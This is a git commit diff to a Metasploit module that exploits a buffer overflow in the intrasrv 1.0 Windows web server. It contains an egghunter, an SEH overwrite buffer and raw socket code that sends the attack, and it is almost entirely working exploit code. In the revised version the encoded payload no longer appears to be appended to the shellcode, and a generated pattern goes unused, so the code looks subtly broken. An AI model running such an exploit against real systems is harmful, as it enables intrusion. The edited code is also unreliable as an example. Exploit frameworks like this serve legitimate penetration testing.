Use tcp mixin/clean corrupt bytes

2013-08-12 15:12:15 -04:00 · 2013-08-12 15:12:15 -04:00 · 28f030494e
parent 7854c452d2
commit 28f030494e
1 changed files with 26 additions and 18 deletions
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@ -10,7 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking

-	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Egghunter

 	def initialize(info={})
@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Payload'        =>
 				{
+					'Space' => '4660',
 					'StackAdjustment' => -3500,
 					'BadChars' => "\x00"
 				},
@ -60,12 +61,16 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def check
-		res =  send_request_cgi({
-				'method' => 'GET',
-				'uri'    => "/"
-		})
+		begin
+			connect
+		rescue
+			print_error("Could not connect to target!")
+			return Exploit::CheckCode::Safe
+		end
+		sock.put("GET / HTTP/1.0\r\n")
+		res = sock.get

-		if res and res.headers['Server'] =~ /intrasrv 1.0/
+		if res =~ /intrasrv 1.0/
 			return Exploit::CheckCode::Vulnerable
 		else
 			return Exploit::CheckCode::Safe
@ -75,27 +80,30 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		# setup egghunter
 		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
-				:checksum => true
+				:checksum=>true, :eggtag=>"w00t"
 			})

 		# setup buffer
-		buf = rand_text(target['Offset']-128)			# junk to egghunter
-		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128
+		buf = rand_text(target['Offset']-126)			# junk to egghunter at jmp -128
+		buf << hunter						# egghunter
 		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
 		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh

 		# Setup payload
-		shellcode = rand_text(50)				# pad payload
-		shellcode = egg + egg					# attach egg tags
-		shellcode << payload.encoded
+		shellcode = egg
+		# second last byte of payload gets corrupted - pad 2 bytes 
+		# so we don't corrupt the actual payload
+		shellcode << rand_text(2)
+		
+		msp = pattern_create(20000)

 		print_status("Sending buffer...")
-		send_request_cgi({
-				'method' => 'GET',
-				'uri'    => "/",
-				'vhost'  => buf,
-				'data'   => shellcode
-		})
+		# Payload location is an issue, so we're using the tcp mixin 
+		# instead of HttpClient here to maximize control over what's sent.
+		# (i.e. no additional headers to mess with the stack)
+		connect
+		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+		disconnect
 	end
 end